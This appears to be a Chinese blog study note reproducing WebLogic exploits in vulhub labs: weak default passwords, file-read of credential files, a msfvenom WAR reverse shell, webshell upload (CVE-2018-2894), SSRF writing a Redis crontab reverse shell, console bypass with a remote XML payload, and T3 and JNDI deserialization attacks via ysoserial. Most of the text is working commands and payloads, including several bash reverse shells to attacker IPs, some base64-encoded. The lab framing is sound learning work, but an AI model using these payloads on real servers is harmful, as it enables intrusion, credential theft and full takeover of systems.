WebLogic
含义
WebLogic是由Oracle公司开发的一款基于Java EE规范的企业级应用服务器。它提供了强大的功能和性能,用于部署、管理和运行企业级Java应用程序。
WebLogic服务器默认的端口号是7001,用于HTTP访问。
弱口令漏洞weakpass
利用常见弱口令爆破进入后台
漏洞环境:vulhub/weblogic/weakpass
service docker start
docker-compose up -d
docker-compose ps
weblogic常用弱口令:
system:password
weblogic:weblogic
admin:secruity
joe:password
mary:password
system:sercurity
wlcsystem: wlcsystem
weblogic:Oracle@123
任意文件读取漏洞
可以读取服务器任意文件。在读取到密钥和密码密文以后,可以AES解密出后台密码。
http://192.168.4.131:7001/hello/file.jsp?path=/etc/passwd (目录扫描)
密文绝对路径:
/root/Oracle/Middleware/user_projects/domains/base_domain/security/SerializedSystemIni.dat,相对路径:security/SerializedSystemIni.dat
密钥绝对路径:
/root/Oracle/Middleware/user_projects/domains/base_domain/config/config.xml ,相对路径:config/config.xml
bp抓包,保存二进制.dat
getshell
1、kali生成木马
msfvenom -p java/meterpreter/reverse_tcp lhost=本地ip lport=4444 -f war -o java.war
生成一个包含 Meterpreter 反向 TCP shell 的 Java Web 应用程序的 .war 文件,可以通过部署该 .war 文件到支持 Java Web 应用程序的服务器上来实现远程访问和控制目标系统。
2、点击左侧 部署->安装->上传war包->(全部下一步)-> 完成
主机上传。war
3、kali监听
msfconsole
use exploit/multi/handler
set payload java/meterpreter/reverse_tcp
set LHOST 本地ip
set LPORT 4444
exploit
4、访问:
http://192.168.142.133:7001/java
C V E - 2 0 1 8 - 2 8 9 4任 意 文 件 上 传
任意文件上传漏洞
影响版本:
10.3.6.0
12.1.3.0
12.2.1.2
12.2.1.3
漏洞环境
vulhub/weblogic/CVE-2018-2894
docker-compose logs | grep password
登录到后台,开启 Web Service Test Page :
登录 -> base-domain ->高级 -> 开启 web测试页 -> 保存
漏洞利用
漏洞地址:
http://192.168.4.131:7001/ws_utc/config.do
1、修改工作目录(一行内容,粘贴的时候去掉换行)
/u01/oracle/user_projects/domains/base_domain/servers/AdminServer/tmp/_WL_internal/com.oracle.webservices.wls.ws-testclient-app-wls/4mcj4y/war/css
2、点击安全——添加,上传大马dama.jsp
3、F12,搜索keystore_table,找到时间戳
4、访问木马(密码password)
http://192.168.142.133:7001/ws_utc/css/config/keystore/【时间戳】_dama.jsp
总结
测试结束没有关闭‘开启 web测试页’,导致可以上传文件
C V E - 2 0 1 4 - 4 2 1 0 SSRF
漏洞描述
1、SSRF是Server-side Request Forge的缩写,中文翻译为服务端请求伪造。产生的原因是由于服务端提供了从其他服务器应用获取数据的功能,并且没有对地址和协议等做过滤和限制。
2、利用SSRF漏洞可以发送Redis协议数据,执行Redis相关命令,进而getshell
漏洞概况
影响版本:
weblogic 10.0.2 – 10.3.6
漏洞环境
vulhub/weblogic/ssrf
获取内网IP:
docker ps 获取容器id
docker exec -it 容器ID ifconfig
访问:
http://ip:7001/uddiexplorer/ (无需登录)
http://ip:7001/uddiexplorer/SearchPublicRegistries.jsp
抓包,修改operator值为:http://内网ip:6379/
6379端口通常是Redis服务器默认的监听端口。
反弹payload
1、payload内容
set 1 "\n\n\n\n0-59 0-23 1-31 1-12 0-6 root bash -c 'sh -i >&
/dev/tcp/攻击者ip/7777 0>&1' \n\n\n\n"
config set dir /etc/
config set dbfilename crontab
save
2、编码网站(encodeURIComponent编码方式)
http://www.kuquidc.com/enc/urlencode.php
将所有%0A替换成 %0D%0A(Redis协议以 CRLF 结尾(即“\r\n”))
3、kali监听
nc -lvp 7777
抓包修改重放
operator=http://内网:6379/test%0D%0A%0D%0Aset%201%20%22%
5Cn%5Cn%5Cn%5Cn0-59%200-23%201-31%201-12%200- 6%20root%20bash%20-c%20'sh%20-
i%20%3E%26%20%2Fdev%2Ftcp%2F192.168.142.162%2F7777%200%3E%
261'%20%5Cn%5Cn%5Cn%5Cn%22%0D%0Aconfig%20set%20dir%20%2F
etc%2F%0D%0Aconfig%20set%20dbfilename%20crontab%0D%0Asave%0
D%0Alalala
C V E - 2 0 2 0 - 1 4 8 8 2远 程 代 码 执 行
漏洞描述
weblogic未授权漏洞:CVE-2020-14882
weblogic命令执行漏洞:CVE-2020-14883
1、CVE-2020-14882允许未授权的用户绕过管理控制台(Console)的权限验证访问后台,CVE-2020-14883允许后
台任意用户通过HTTP协议执行任意命令。
2、使用这两个漏洞组成的利用链,可通过一个GET请求在远程Weblogic服务器上以未授权的任意用户身份执行命令。
任意代码执行漏洞
影响版本:
10.3.6.0.0
12.1.3.0.0
12.2.1.3.0
12.2.1.4.0
14.1.1.0.0
漏洞环境
vulhub/weblogic/CVE-2020-14882
测试是否存在未授权访问:
http://ip:7001/console/css/%252e%252e%252fconsole.port
al?_nfpb=true&_pageLabel=JmsSAFAgentSAFAgentTablePage&handle=co
m.bea.console.handles.JMXHandle%28%22com.bea%3AName%3Dbase_d
omain%2CType%3DDomain%22%29
利用方式
通过把payload构造为XML格式进行引用
1、poc.xml 通过TCP连接与指定主机建立交互式的Bash shell。
<value>/bin/bash</value> 指定了要执行的命令的路径为 /bin/bash,即Bash shell。
<value>-c</value> 指定了Bash shell的参数 -c
<value><![CDATA[bash -i>& /dev/tcp/kaliIP/5555 0>&1]]></value>
使用CDATA标记表示这是一段文本数据,不需要进行XML转义。具体命令是 bash -i>& /dev/tcp/kaliIP/5555 0>&1,这个命令的作用是通过TCP连接向IP地址为 kaliIP、端口号为 5555 的主机发送一个交互式的Bash shell。
2、HTTP服务/监听端口(kali)
python -m http.server 8888
Python 会启动一个简单的 HTTP 服务器,并监听在本地的 8888 端口上。你可以通过浏览器或其他 HTTP 客户端访问这个服务器,来查看服务器上的文件或资源。
nc -lvp 5555
3、访问
http://靶机ip:7001/console/images/%252E%252E%252Fconsole.portal?_nfpb=true&_pageLabel=HomePage1&handle=com.bea.core.repackaged.springframework.context.support.ClassPathXmlApplicationContext("http://kaliIP:8888/poc.xml")
weblogictool(配合fofo)
C V E - 2 0 1 8 - 2 6 2 8 T 3 协议 反 序 列 化 漏 洞
漏洞描述
1、Weblogic开放控制台的7001端口,默认会开启T3协议服务
2、Weblogic的T3协议实现了RMI(远程方法调用),在WebLogic Server 和其他 Java 程序间传输数据
3、T3协议的缺陷触发了Weblogic Server WLS Core Components中存在的反序列化漏洞
4、攻击者可以发送构造的恶意T3协议数据,服务器反序列化以后执行恶意代码,获取到目标服务器权限
T3反序列化漏洞概况
影响版本:
10.3.6.0
12.1.3.0
12.2.1.2
12.2.1.3
漏洞环境
vulhub/weblogic/CVE-2018-2628
T3协议检测
nmap -n -v -p 7001,7002 192.168.142.133 --script=weblogic-t3-info
复现步骤(总体)
1、kali启动JRMPListener,参数包含恶意代码恶意代码的作用是连接到7777端口)
2、kali创建7777端口监听
3、运行poc.py,让漏洞服务器主动连接RMI服务器,进而下载恶意代码,建立反弹连接
payload准备
1、生成payload
bash -i >& /dev/tcp/192.168.142.162/7777 0>&1
payload生成网站:https://wiki.bafangwy.com/doc/401/
2、kali启动JRMPListener
java -cp ysoserial.jar ysoserial.exploit.JRMPListener 8761 CommonsCollections1 "bash -c
{echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjE0Mi4xNjIvNzc3NyAwPiYx}|{base64,-d}|{bash,-i}"
3、kali监听
nc -lvp 7777
4、kali运行运行POC(只支持Python2)
python2 cve-2018-2628-exp.py 192.168.142.133 7001 ysoserial.jar 192.168.142.162 8761 JRMPClient
C V E - 2 0 1 7 - 1 0 2 7 1XML 反 序 列 化 漏 洞
Weblogic的WLS Security组件对外提供webservice服务,其中使用了XMLDecoder来解析用户传入的XML数据,在解析的过程中出现反序列化漏洞,导致可执行任意命令。
C V E - 2 0 2 3 - 2 1 8 3 9J N D I 注 入 漏 洞
漏洞描述
1、T3/IIOP协议支持远程绑定对象bind到服务端,而且可以通过lookup代码c.lookup(“xxxxxx”); 查看
2、远程对象继承自OpaqueReference并lookup查看远程对象时,服务端会调用远程对象getReferent方法
3、由于weblogic.deployment.jms.ForeignOpaqueReference继承自OpaqueReference并实现getReferent方法,存在retVal =context.lookup(this.remoteJNDIName)实现,所以能够通过RMI/LDAP远程协议进行远程命令执行
利用流程
1、kali启动LDAP服务器,指定payload
java -jar JNDI-Injection-Exploit-1.0.jar -C "bash -c
{echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjE0Mi4xNjIvNzc3NyAwPiYx}|{base64,-d}|{bash,-i}"
这个jar包无需启动HTTP服务器,比marshalsec.jar更省事
payload生成方法和CVE-2018-2628完全一样
2、Kali监听端口
nc -lvp 7777
3、Windows向漏洞服务器发送poc
CVE-2023-21839.exe -ip 192.168.142.133 -port 7001 -ldap ldap://192.168.142.162:1389/bi5iwt
1833
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
